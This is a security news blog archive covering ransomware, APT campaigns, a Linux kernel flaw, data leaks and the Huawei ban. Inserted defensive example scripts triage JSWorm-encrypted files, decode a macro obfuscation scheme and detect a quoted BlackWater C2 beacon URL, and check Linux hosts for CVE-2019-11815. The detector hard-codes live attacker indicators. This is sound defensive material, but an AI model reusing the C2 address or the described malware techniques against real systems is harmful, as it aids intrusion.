Category Archives: information security news

Emsisoft released a free Decrypter for JSWorm 2.0

Good news for the victims of the JSWorm 2.0 ransomware: thanks to experts at Emsisoft, they can decrypt their files for free.

Emsisoft’s malware research team has released a decrypter for a recently discovered ransomware tracked as JSWorm 2.0.

JSWorm 2.0 is written in C++ and uses Blowfish encryption. The first version of the malware was written in C# and used the “.JSWORM” extension. Researchers believe both versions were developed by the same author.

Researchers found notable call-outs in two different malware samples naming ID Ransomware and several prominent malware researchers:

“:HI SIRI, DEMONSLAY AND AMIIIIGO!!! HOW ARE YOU?”

and

“:ID-RANSOMWARE, IT’S JUST THE BEGINING [sic] OF SOMETHING NEW…”

Experts pointed out that there have been multiple confirmed submissions to ID Ransomware, the online service that lets victims upload encrypted files to identify the ransomware that infected their machines. Since January 2019, encrypted files have been uploaded from South Africa, Italy, France, Iran, Vietnam, Argentina, the United States, and other countries.

“Its files have the “.[ID-<numbers>][<email>].JSWORM” extension and the ransom note file named “JSWORM-DECRYPT.txt.”” reads the post published by Emsisoft.

Once it has infected a computer, JSWorm 2.0 performs the following actions (as listed in Emsisoft’s post):

  • Sets the “EnableLinkedConnections” registry key, which allows it to attack mapped drives when run as admin.
  • Restarts SMB services (lanmanworkstation) to take effect (we are investigating if there’s more to the SMB vector).
  • Stops services for databases (MSSQL, MySQL, QuickBooks), kills shadow copies, disables recovery mode.
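An added triage helper (example code, not Emsisoft’s decrypter and not part of the original post) that applies the file-naming pattern quoted above to find encrypted files and ransom notes on a share and to pull out the victim ID and attacker contact address embedded in each name, which is what a responder wants to know before running the decrypter. The directory layout and file names it builds are constructed sample data, not real victim files.

```python
"""Added example (not Emsisoft's or Security Affairs' code): find files renamed
by JSWorm 2.0 and extract the victim ID and attacker e-mail from each name."""
import os
import re
import tempfile
from collections import Counter

# Extension described by Emsisoft: ".[ID-<numbers>][<email>].JSWORM"
JSWORM_RE = re.compile(
    r"^(?P<original>.+)\.\[ID-(?P<victim_id>\d+)\]\[(?P<email>[^\]]+)\]\.JSWORM$",
    re.IGNORECASE,
)
RANSOM_NOTE = "JSWORM-DECRYPT.txt"  # ransom note name from Emsisoft's post


def parse_jsworm_name(name):
    """Return (original_name, victim_id, email), or None if the name does not
    follow the JSWorm 2.0 scheme."""
    m = JSWORM_RE.match(name)
    if not m:
        return None
    return m.group("original"), m.group("victim_id"), m.group("email")


def triage(root):
    """Walk a directory tree and report encrypted files, ransom notes and the
    (victim_id, email) pairs seen. More than one pair on a share means more
    than one infection, each needing its own ransom note for the decrypter."""
    encrypted, notes, ids = [], [], Counter()
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if fname == RANSOM_NOTE:
                notes.append(path)
                continue
            parsed = parse_jsworm_name(fname)
            if parsed:
                encrypted.append(path)
                ids[(parsed[1], parsed[2])] += 1
    return {"encrypted": encrypted, "notes": notes, "ids": dict(ids)}


def build_sample_tree():
    """Constructed sample (not real victim data): a temporary directory shaped
    like a small infected share, with two encrypted files and two notes."""
    root = tempfile.mkdtemp(prefix="jsworm_triage_")
    os.makedirs(os.path.join(root, "Finance"))
    for rel in (
        "report.xlsx.[ID-1234567][attacker@example.com].JSWORM",
        "Finance/budget.docx.[ID-1234567][attacker@example.com].JSWORM",
        "Finance/notes.txt",
        RANSOM_NOTE,
        "Finance/" + RANSOM_NOTE,
    ):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("placeholder\n")
    return root


if __name__ == "__main__":
    result = triage(build_sample_tree())
    print(f"{len(result['encrypted'])} encrypted files, {len(result['notes'])} ransom notes")
    for (victim_id, email), count in result["ids"].items():
        print(f"  ID {victim_id}, contact {email}: {count} files")
```

Run it against the root of a mapped drive instead of the sample tree to get the same summary for a real share; the counts per (ID, e-mail) pair tell you how many distinct notes you will need to feed the decrypter.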

Victims of JSWorm 2.0 can follow the instructions below to decrypt their files for free:

  1. Download the Emsisoft JSWorm 2.0 Decrypter.
  2. Run the executable and confirm the license agreement when asked.
  3. Click “Browse” and select the ransom note file on your computer.
  4. Click “Start” to decrypt your files. Note that this may take a while.

Done!

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – JSWorm 2.0, ransomware)

The post Emsisoft released a free Decrypter for JSWorm 2.0 appeared first on Security Affairs.

Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones

Since April 2019, Group-IB has successfully blocked more than 43,000 links to pirated copies of the Game of Thrones Season 8 on pirate websites, forums, and social media

As the Game of Thrones saga came to a close (no spoilers here), Group-IB has summed up the results of its anti-piracy campaign during Season 8 of Game of Thrones, one of the biggest franchises in TV history. Since April 2019, when the final season premiered, Group-IB’s Anti-Piracy team has successfully blocked more than 43,000 links to pirated copies of GOT Season 8 on pirate websites, forums, and social media. Group-IB’s Anti-Piracy team was brought in to protect Game of Thrones against online pirates back in 2015. Since then, the company’s specialists have blocked more than 180,000 links to illegal copies of Game of Thrones in Russian.

The final GOT Season 8 premiered on 14 April and became one of the show’s most popular seasons not only among fans all over the world, but also among online pirates. Group-IB’s Anti-Piracy team discovered and blocked 43,711 links to pirated Season 8 episodes in Russian. Illegal copies surfaced on pirate websites, forums, and social media. Pirated copies of the GOT Season 8 episodes were spotted on 1,098 different websites, 94 of which were designed exclusively for the distribution of pirated GOT copies.

More than 30,000 unique links to pirated GOT episodes have been removed from the search results of the Russian search engine Yandex. In response to the blocking, online pirates struck back by creating mirrors on a daily basis – copies of their websites with new but very similar domain names. For instance, one of the pirates created more than 20 mirrors on their subdomains. However, according to the pirates’ forum posts, the owners of pirate websites were not ready for the “attack” on them: “Looks like somebody just wiped the links out. Some of the pages disappeared… some of them do not appear in search results”. It is also interesting that some of the groups on VK.com, a Russian social network, removed pirated episodes after receiving complaints and turned into GOT fan pages.

The streaming service Amediateka holds exclusive distribution rights for Game of Thrones in Russia and, since April 2015, when Season 5 premiered, has used Group-IB’s services to fight online pirates distributing illegal copies of GOT in Russian. Season after season, online pirates’ interest in the show has only increased. For example, while Season 5 was broadcast, Group-IB’s Anti-Piracy team detected and removed 2,067 links to illegal copies. Season 7 saw an increase, reaching 12,540 links to pirated episodes detected and blocked. Season 8 set a record of 43,711 links. Over the past 4 years, Group-IB detected and blocked more than 180,000 links, including links detected and blocked between seasons.


GOT is not the only Amediateka show that Group-IB’s Anti-Piracy team protects, but it turned out to be the pirates’ favorite. Pirates’ other top targets include True Detective, with 23,473 pirated links detected and blocked, Billions (20,303 links), The Good Wife (14,541 links), and Westworld, with 12,229 links detected and blocked by the Group-IB Anti-Piracy team.

“For us the battle against online pirates, trying to profit off the illegal distribution of the Game of Thrones in Russian, was as fierce as for George R.R. Martin’s characters,” commented Andrey Busargin, Director of Anti-Piracy and Brand Protection at Group-IB. “I would also like to highlight Amediateka’s commitment to counter online piracy in Russia: they brought in Group-IB Anti-Piracy team ahead of time and have been making continuous efforts to popularize legal viewership of the Game of Thrones making it available on its website, in movie theaters all over the country and even on the stadium.”

Group-IB’s fight against digital piracy started in 2011, when its Anti-Piracy Department was established. Group-IB’s Anti-Piracy team uses its own machine-learning technologies, also applied in complex investigations of cyberattacks, to detect pirate websites, find their owners and block illegal content. Group-IB’s Anti-Piracy system monitors 100,000+ resources in all languages, ranging from torrent trackers and streaming services to social media groups and pirate platforms on the DarkNet. The average time to detect the first pirated copy on the Internet is 30 minutes. 80% of pirated links are blocked by the Group-IB team within 24 hours of their appearance on the Internet.



About the author: Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

The report published by Group-IB is available here:

https://www.group-ib.com/resources/threat-research/js-sniffers.html

Pierluigi Paganini

(SecurityAffairs – piracy, Game of Thrones)


After the latest Microsoft Windows updates, some PCs running Sophos AV fail to boot

Sophos is warning customers of problems with the latest Microsoft Patch Tuesday updates and is telling them to roll the updates back if they want their PCs to boot.

The security firm has informed its customers of problems with the latest Microsoft Patch Tuesday updates and is asking them to uninstall the patch if they want the machine to boot.

This means that the machines remain exposed to attacks that leverage the vulnerabilities addressed by Microsoft, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attacks.

Sophos confirmed that the latest set of Windows updates is causing boot problems on computers running its antivirus software.

“We have had a few customers reporting that following on from the Microsoft Windows 14th May patches they are experiencing a hang on boot where the machines appear to get stuck on “Configuring 30%”” reads a note published by the company.

Experts believe the problems could be caused by an incompatibility with the KB4499164 and KB4499175 Microsoft updates released on May 14, 2019.

According to Sophos, the problems have been reported by customers running Windows 7 and Windows Server 2008 R2.


Sophos suggests removing the Windows update after booting the system in Safe Mode.

“Current reports indicate that removing the Windows update in Safe Mode allows computers to boot as normal.” continues the note.

“If you experience issues removing this in Safe Mode please set the “Sophos Anti-Virus” Service startup to be “Disabled” and then attempt to remove the update after coming out of Safe Mode.”

Sophos is currently working with Microsoft to investigate the issue and develop a fix.

Microsoft’s Patch Tuesday updates for May 2019 also addressed a remote code execution flaw in Remote Desktop Services (RDS). The flaw, tracked as CVE-2019-0708, can be exploited by an unauthenticated attacker who connects to the targeted system via the Remote Desktop Protocol (RDP) and sends specially crafted requests. Microsoft pointed out that this vulnerability is wormable: it can be triggered by an unauthenticated attacker without any user interaction, making it possible for malware to spread uncontrolled across target networks.

The problem faced by Sophos customers could be very annoying for large businesses that deployed the Microsoft updates. One user commenting on a blog post published by Sophos wrote:

“We had to roll back some 300+ machines for clients around the US.”

Affected users who are unable to boot their machines have to contact the company and open a ticket with the tech support team.



Pierluigi Paganini

(SecurityAffairs – Sophos, Microsoft)


MuddyWater BlackWater campaign used new anti-detection techniques

A recent MuddyWater campaign tracked as BlackWater shows that the APT group added new anti-detection techniques to its arsenal.

Security experts at Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group (aka SeedWorm and TEMP.Zagros). 

The researchers also pointed out that the cyber espionage group has been updating its tactics, techniques, and procedures (TTPs), adding three distinct steps to its operations to avoid detection.

The first MuddyWater campaign was observed in late 2017, when it targeted entities in the Middle East.

The experts named the group ‘MuddyWater’ because of the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

In June 2018, Trend Micro researchers discovered a new attack relying on weaponized Word documents and PowerShell scripts that appeared related to MuddyWater. The final payload delivered in the campaign was the PRB-Backdoor RAT, controlled by a command and control (C&C) server at outl00k[.]net.

This campaign aims at installing a PowerShell-based backdoor onto the victim’s machine for espionage purposes.


As part of the recent BlackWater campaign, the MuddyWater APT group leveraged an obfuscated Visual Basic for Applications (VBA) macro script to add a Run registry key and gain persistence.

The attackers then used a PowerShell stager script, masquerading as a red-teaming tool, that would download a PowerShell-based Trojan from a C2 server.

The stager downloads from the C2 a component of the FruityC2 agent script, an open-source framework hosted on GitHub, which it uses to enumerate the host machine.

“This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity.” reads the analysis published by Talos group. “Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated.”

In more recent samples the cyberspies also replaced some variable strings to evade signature-based detection by YARA rules.

The attackers used a document that, once opened, prompted the user to enable a macro titled “BlackWater.bas”. They password-protected the macro to prevent the user from viewing it in the Visual Basic editor. The “BlackWater.bas” macro was obfuscated with a substitution cipher in which each character is replaced by its corresponding integer code.

“This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”.” continues the analysis. “Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script. Next, the script would enumerate the victim’s machine”
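Two things a defender might build from the details above, as an added example (not Talos’ code and not part of the original post): a decoder for strings obfuscated by replacing each character with its integer code, the scheme described for the BlackWater.bas macro, and a detector that flags the quoted beacon URL and its 300-second cadence in proxy logs. The page does not show how the integers are delimited in the real macro, so a space-separated list of decimal codes is assumed; the log format and the log lines are constructed sample data.

```python
"""Added example (not Talos' code): decode integer-substituted macro strings and
flag the BlackWater beacon plus its 300 s cadence in proxy logs."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median


def decode_int_substitution(blob, sep=" "):
    """'66 108 97 99 107' -> 'Black'. Assumes space-separated decimal codes;
    the real macro's delimiter is not shown on the page."""
    return "".join(chr(int(tok)) for tok in blob.split(sep) if tok.strip())


def encode_int_substitution(text, sep=" "):
    """Inverse of the decoder; used only to build constructed test input."""
    return sep.join(str(ord(c)) for c in text)


# Indicators quoted by Talos (the IP is de-fanged on the page as 82[.]102[.]8[.]101).
BEACON_HOST = "82.102.8.101"
BEACON_RE = re.compile(r"/bcerrxy\.php\?rCecms=BlackWater\b")

# Constructed proxy log (not real traffic): "<ISO time> <client> <method> <url>"
SAMPLE_LOG = """\
2019-05-20T10:00:00 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
2019-05-20T10:00:07 10.0.0.9 GET http://www.example.org/index.html
2019-05-20T10:05:00 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
2019-05-20T10:10:00 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
2019-05-20T10:12:31 10.0.0.9 GET http://www.example.org/news
2019-05-20T10:15:00 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def find_beacons(log_text, period=300, tolerance=30):
    """Return {client: {"requests": n, "periodic": bool}} for clients that hit the
    C2 host or the beacon path. 'periodic' is True when the median gap between
    their hits is within `tolerance` seconds of the 300 s interval Talos saw."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed format
        ts, client, _method, url = m.groups()
        if BEACON_HOST in url or BEACON_RE.search(url):
            times[client].append(datetime.fromisoformat(ts))
    hits = {}
    for client, stamps in times.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        periodic = len(gaps) >= 2 and abs(median(gaps) - period) <= tolerance
        hits[client] = {"requests": len(stamps), "periodic": periodic}
    return hits


if __name__ == "__main__":
    encoded = encode_int_substitution("BlackWater")
    print(encoded, "->", decode_int_substitution(encoded))
    for client, info in find_beacons(SAMPLE_LOG).items():
        print(client, info)
```

The host and path match alone is enough to alert on the quoted indicators; the cadence check is what still catches the agent after the actor rotates the C2 address, since the 300-second hello interval is a property of the script rather than of the infrastructure.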

Experts conclude that even if the changes implemented by the threat actor were minimal, they were significant enough to avoid detection and to allow the group to continue to perform operations.



Pierluigi Paganini

(SecurityAffairs – MuddyWater, APT)


US Commerce Department delays Huawei ban for 90 Days

The US Commerce Department will delay the announced Huawei ban by 90 days to avoid major disruption to existing operations.

Over the weekend, Reuters reported exclusively that Alphabet Inc’s Google has suspended some business with Huawei after Trump’s ban on the telco giant.

On Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday the U.S. Commerce Department said it was considering easing the restrictions on the company to “prevent the interruption of existing network operations and equipment”.

Now a Commerce Department filing confirms that the delay does not change Trump’s ban, but grants a 90-day temporary license that allows Huawei to continue doing business with American companies.

The Temporary General License aims to prevent the disruption of existing operations, which could have a dramatic impact on mobile users and broadband network operators.

“The Temporary General License grants operators time to make other arrangements and (gives) the Department space to determine the appropriate long term measures for Americans and foreign telecommunications providers that currently rely on Huawei equipment for critical services,” said Secretary of Commerce Wilbur Ross.

“In short, this license will allow operations to continue for existing Huawei mobile phone users and rural broadband networks.”


While the tech giant is at the center of a heated debate, Five Eyes intelligence agencies believe that Huawei equipment for 5G infrastructure poses a “significant network security risk”, and for this reason they have asked mobile companies to avoid using the Chinese company’s equipment.

The Chinese company was founded in 1987 by a former People’s Liberation Army officer. The US was the first country to warn of the security risks associated with the use of products manufactured by the Chinese telecommunications giant.

US intelligence believes Huawei equipment is tainted with backdoors that could allow Chinese intelligence to spy on the communications networks of rival countries.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States highlighted the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy and Japan. Many countries are about to build 5G infrastructure, but their governments’ approaches differ completely.

Now the US Commerce Department has delayed the ban for 90 days. Experts believe that Huawei is only the first of several Chinese companies that will face similar measures because they could threaten the economic and technological leadership of the United States.



Pierluigi Paganini

(SecurityAffairs – Huawei ban, China)


Data belonging to Instagram influencers and celebrities exposed online

A new data leak has made the headlines: a database containing the contact information of millions of Instagram influencers, celebrities and brand accounts has been found online.

The news was first reported by TechCrunch: the database was left unprotected in an AWS bucket, and anyone was able to access it without authentication.


The unprotected database was discovered by security researcher Anurag Sen, who immediately reported the discovery to TechCrunch in an effort to find the owner.

“A massive database containing contact information of millions of Instagram  influencers, celebrities and brand accounts has been found online.” states TechCrunch.

“At the time of writing, the database had over 49 million records — but was growing by the hour.”

The database contained public data scraped from influencers’ Instagram accounts, including their bio, profile picture, number of followers, whether they are verified, and their location by city and country, alongside private contact information: the email address and phone number of the Instagram account owner.

Each record in the database also contained a field that calculated the worth of each account.

The list of influencers in the archive includes prominent food bloggers, celebrities and other social media influencers.

According to TechCrunch, the database belongs to India-based social media marketing firm Chtrbox, which pays influencers to post sponsored content on their accounts.

Strangely, two people contacted by TechCrunch who confirmed the authenticity of the data in the archive denied any involvement with Chtrbox.

“We contacted several people at random whose information was found in the database and provided them their phone numbers. Two of the people responded and confirmed their email address and phone number found in the database was used to set up their Instagram accounts.” continues the website. “Neither had any involvement with Chtrbox, they said.”

TechCrunch contacted Chtrbox, which secured the database, but it is not clear how the company obtained the data.

Facebook, which owns Instagram, announced that it is investigating the incident.

“We’re looking into the issue to understand if the data described – including email and phone numbers – was from Instagram or from other sources,” reads a statement from Facebook. “We’re also inquiring with Chtrbox to understand where this data came from and how it became publicly available,”

In 2017, a vulnerability in the Instagram application allowed hackers to access information on high-profile users, including the phone numbers and email addresses of 6 million celebrities.



Pierluigi Paganini

(SecurityAffairs – Instagram, data leak)


Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS

Experts discovered a privilege escalation vulnerability in the Linux kernel, tracked as CVE-2019-11815, that affects the implementation of RDS over TCP.

Experts discovered a memory corruption vulnerability in the Linux kernel that resides in the implementation of Reliable Datagram Sockets (RDS) over TCP.

The vulnerability, tracked as CVE-2019-11815, could lead to privilege escalation and received a CVSS base score of 8.1. It only affects Linux kernels prior to 5.0.8 on which the RDS over TCP module (rds_tcp) is loaded.

“An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.” reads the advisory published by NIST.

NIST classified the flaw as a race condition in the kernel’s rds_tcp_kill_sock function in net/rds/tcp.c.

According to the CVSS vector assigned by NIST, the vulnerability could be exploited over the network by a remote attacker with no privileges and does not require user interaction; as noted below, however, the Ubuntu security team has seen no evidence that it is actually remotely exploitable.

An attacker could exploit the vulnerability to access restricted information or trigger a denial of service condition.

“A system that has the rds_tcp kernel module loaded (either through autoload via local process running listen(), or manual loading) could possibly cause a use after free (UAF) in which an attacker who is able to manipulate socket state while a network namespace is being torn down,” reads the advisory published by Red Hat.

According to a note included in the security advisory published by Canonical, there is no evidence that the bug is remotely exploitable.

“I haven’t yet seen evidence to support allegations that this is remotely exploitable. Blacklisting rds.ko module is probably sufficient to prevent the vulnerable code from loading.” said Seth Arnold from the Ubuntu’s security team. “The default configuration of the kmod package has included RDS in /etc/modprobe.d/blacklist-rare-network.conf since 14.04 LTS. I’m dropping priority as a result.”

SUSE and Debian also published security advisories for the CVE-2019-11815 vulnerability.
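An added host check (example code, not from the NIST, Red Hat, Canonical, SUSE or Debian advisories and not part of the original post) that turns the facts quoted above into a single verdict: whether the running kernel predates 5.0.8, whether any rds module is loaded, and whether the modprobe configuration blacklists rds as the Ubuntu note suggests. The kernel release, lsmod output and modprobe.d text are passed in as strings so the checks also run against captured output. Two caveats are built in: the version check ignores distribution suffixes, so a distro kernel that backported the fix is still reported by version as affected, and a plain blacklist entry only stops alias-based autoloading (such as the listen() trigger Red Hat mentions), not an explicit modprobe.

```python
"""Added example (not from any vendor advisory): CVE-2019-11815 exposure check.
Assumes the facts quoted on the page: kernels before 5.0.8 are affected, only
when the rds_tcp module is loaded, and blacklisting rds keeps it from loading."""
import glob
import re
import subprocess

FIXED = (5, 0, 8)  # first mainline release with the fix, per the NIST entry


def parse_kernel_version(release):
    """'4.15.0-50-generic' -> (4, 15, 0). Distro suffixes are ignored, so a
    distribution kernel that backported the fix still compares as affected."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unparseable kernel release: {release!r}")
    return tuple(int(x or 0) for x in m.groups())


def version_affected(release):
    return parse_kernel_version(release) < FIXED


def rds_modules_loaded(lsmod_text):
    """Names of rds* modules present in `lsmod` output (header line skipped
    because 'Module' does not start with 'rds')."""
    names = set()
    for line in lsmod_text.splitlines():
        fields = line.split()
        if fields and fields[0].startswith("rds"):
            names.add(fields[0])
    return sorted(names)


def rds_blacklisted(modprobe_conf_text):
    """True if a modprobe.d line blacklists rds (the entry Ubuntu ships in
    blacklist-rare-network.conf) or forces 'install rds' to fail, which also
    blocks explicit loading. Comments and leading whitespace are ignored."""
    for raw in modprobe_conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if re.match(r"^blacklist\s+rds$", line):
            return True
        if re.match(r"^install\s+rds\s+/bin/(false|true)$", line):
            return True
    return False


def assess(release, lsmod_text, modprobe_conf_text):
    """Combine the three facts into one verdict string."""
    loaded = rds_modules_loaded(lsmod_text)
    if not version_affected(release):
        return "not affected: kernel at or above 5.0.8"
    if loaded:
        return "exposed: affected kernel with " + ", ".join(loaded) + " loaded"
    if rds_blacklisted(modprobe_conf_text):
        return "mitigated: affected kernel, rds not loaded and blacklisted"
    return "at risk: affected kernel, rds not loaded but could be autoloaded"


def _run(cmd):
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    conf = ""
    for path in glob.glob("/etc/modprobe.d/*.conf"):
        with open(path) as fh:
            conf += fh.read()
    print(assess(_run(["uname", "-r"]).strip(), _run(["lsmod"]), conf))
```

On a host that reports “at risk”, adding `install rds /bin/false` to a file under /etc/modprobe.d closes both the autoload and the explicit-load paths; if rds_tcp is already loaded, unloading it is not enough on its own, since the race is in namespace teardown, and the kernel should be updated.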



Pierluigi Paganini

(SecurityAffairs – Linux, CVE-2019-11815)


Defiant Tech firm who operated LeakedSource pleads guilty

The Royal Canadian Mounted Police (RCMP) announced that Defiant Tech Inc., the company behind LeakedSource, has pleaded guilty in Canada.

Defiant Tech Inc., the company behind the LeakedSource.com website, has pleaded guilty in Canada.

The LeakedSource website was launched in late 2015; in January 2017 the popular data breach notification site was raided by law enforcement.

It reported some of the largest data breaches, including the ones that affected Last.fm, Rambler.ru, FriendFinder Networks, LinkedIn, and MySpace.


In December 2017, Canadian man Jordan Evan Bloom (27) was charged over the trafficking of some 3 billion hacked account records; he was running a website that collected personal data and login credentials from breach victims.

The man was charged as part of an investigation dubbed “Project Adoration”, for trafficking in identity information, unauthorized use of computers, and possession of property obtained by crime.

The RCMP alleges that Bloom was the administrator of the LeakedSource.com website, which operated through his company Defiant Tech.

LeakedSource sold access to data gathered from the victims of security breaches, sometimes buying it from hackers.

For $2 a day, a LeakedSource subscriber could look up an individual’s details by entering an email address or username. LeakedSource also cracked the associated passwords where possible. The website was very popular among the users of HackForums.net.

“A guilty plea was entered in court today by Defiant Tech Inc., to the charges of Trafficking In Identity Information and Possession of Property Obtained By Crime a year and a half after charges were laid into the RCMP’s cybercrime investigation dubbed Project “Adoration”. ” reads the press release published by RCMP.

“LeakedSource.com had a database of approximately three billion personal identity records and associated passwords that could be purchased for a small fee. Defiant Tech Inc. was operating the LeakedSource.com website and the company earned approximately $247,000 from trafficking identity information. “

The arrest of Bloom is the result of a joint effort of Canadian authorities, FBI and Dutch National Police.

According to the Royal Canadian Mounted Police, Defiant Tech made around CAN$247,000 (US$183,000) from its illegal activities.

“We are pleased with this latest development,” said Superintendent Mike Maclean, Officer in Charge Criminal Operations of the RCMP National Division. “I am immensely proud of this outcome as combatting cybercrime is an operational priority for us.”

Bloom reportedly did not operate the website alone; at least one US citizen was also involved, but no one else has been charged.



Pierluigi Paganini

(SecurityAffairs – cybercrime, LeakedSource)


Chronicle experts spotted a Linux variant of the Winnti backdoor

Security researchers from Chronicle, Alphabet’s cyber-security division, have spotted a Linux variant of the Winnti backdoor.

Security experts from Chronicle, Alphabet’s cyber-security division, have discovered a Linux variant of the Winnti backdoor. It is the first time that researchers have found a Linux version of the backdoor used by the China-linked APT groups tracked as Winnti.


The experts believe that several APT groups operate under the Winnti umbrella, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and procedures (TTPs) and in some cases share portions of the same hacking infrastructure.

Chronicle researchers made the discovery while investigating the cyber attack that hit the pharmaceutical company Bayer in April.

Searching for samples of Winnti malware on its VirusTotal platform, the experts discovered a Linux variant of Winnti dating back to 2015. At the time the malware was used in the hack of a Vietnamese gaming company.

“In April 2019, reports emerged of an intrusion involving Winnti malware at a German Pharmaceutical company.” reads the analysis published by Chronicle. “Analysis of these larger convoluted clusters is ongoing. While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company, we identified a small cluster of Winnti samples designed specifically for Linux.”

The technical analysis of the Linux version of the Winnti backdoor revealed two files: the main backdoor (libxselinux) and a library (libxselinux.so) used to evade detection.

The Winnti backdoor has a modular structure and implements distinct functionalities through plugins. During the analysis, the researchers were unable to recover any active plugins. Experts believe the attackers used additional Linux modules to implement plugins for remote command execution, file exfiltration, and SOCKS5 proxying on the infected host.

Further analysis revealed many code similarities between the Linux variant and the Winnti 2.0 Windows version.

“The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report.” continues the report. “Embedded in this sample’s configuration are three command-and-control server addresses and two additional strings we believe to be campaign designators. In Winnti ver. 1, these values were designated as ‘tag’ and ‘group’.”

Like the Windows variants of the Winnti backdoor, the Linux version handles outbound communications using multiple protocols, including ICMP, HTTP, and custom TCP and UDP protocols.

The Linux version also implements a feature that allows threat actors to initiate connections to infected hosts without requiring a connection to a control server.

The feature could allow attackers to directly access infected systems when access to the hard-coded control servers is disrupted.

“This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted. Additionally, the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts.” continues the report. “This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts.”

In 2016, the Winnti hackers also hit German heavy industry giant ThyssenKrupp to steal company secrets.

Technical information about the above feature was also shared by the ThyssenKrupp CERT, whose experts released an Nmap script that can be used to identify Winnti infections through network scanning.

“An expansion into Linux tooling indicates iteration outside of their traditional comfort zone. This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemetry blindspot in many enterprises, as is with Penquin Turla and APT28’s Linux XAgent variant.” concludes the report, which includes IoCs and YARA rules for the identification of the threat.



Pierluigi Paganini

(SecurityAffairs – Winnti, Linux malware)


Google will block Huawei from using Android and its services

Reuters reported exclusively that Alphabet Inc’s Google has suspended some business with Huawei after Trump’s ban on the telco giant.

The news is a bombshell: Google has suspended some business with Huawei after Trump’s ban on the Chinese telco giant.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks to national security of adopting Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.


The decision is a blow to Huawei and has a significant impact on its strategy.

Just on Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday the U.S. Commerce Department said it was considering scaling back the restrictions on the company to “prevent the interruption of existing network operations and equipment”.

“Alphabet Inc’s Google has suspended business with Huawei that requires the transfer of hardware, software and technical services except those publicly available via open source licensing.” Reuters reported.

Google explained that there will be no impact on current owners of Huawei devices running Google software because they will continue to receive updates provided by the US firm.

“We are complying with the order and reviewing the implications,” said a Google spokesperson.

“For users of our services, Google Play and the security protections from Google Play Protect will continue to function on existing Huawei devices.”

Of course, the decision will disrupt the commercial activity of the Chinese telco firm outside China. Anyone who buys a new Huawei device will have no access to Google’s Android updates and no access to Google services, including the Google Play Store and the Gmail and YouTube apps.

Google confirmed that Huawei will only be able to use the public version of Android, the Android Open Source Project (AOSP), but the users of the Chinese giant will not be able to access proprietary apps and services from Google.

The Google decision could make it impossible for the Chinese company to sell its devices abroad and other companies could interrupt any trade with the company fearing repercussions.

Intel Corp, Qualcomm Inc, Xilinx Inc, and Broadcom Inc have already announced that they will not supply critical software and components to Huawei until further notice.

Is the Chinese giant ready to face this earthquake?

According to the company, it is already working to develop its own technology fearing a total block from US companies.

“Huawei has said it has spent the last few years preparing a contingency plan by developing its own technology in case it is blocked from using Android. Some of this technology is already being used in products sold in China, the company has said.” reported the Reuters.

